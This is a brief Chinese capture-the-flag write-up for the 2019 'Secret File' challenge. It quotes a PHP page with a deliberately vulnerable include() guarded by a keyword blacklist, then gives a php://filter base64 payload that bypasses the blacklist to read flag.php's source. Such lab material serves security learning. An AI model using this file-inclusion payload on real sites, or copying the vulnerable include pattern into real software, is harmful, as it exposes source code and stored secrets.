[极客大挑战 2019]Secret File
查看源码得到Archive_room.php
转到Archive_room.php
点击SECRET后跳转到end.php,没有找到有用的信息。
burpsuite抓包,重放可得
访问secr3t.php得到源码
<html>
<title>secret</title>
<meta charset="UTF-8">
<?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file);
//flag放在了flag.php里
?>
</html>
看到file与include,尝试伪协议读取flag.php
payload
secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php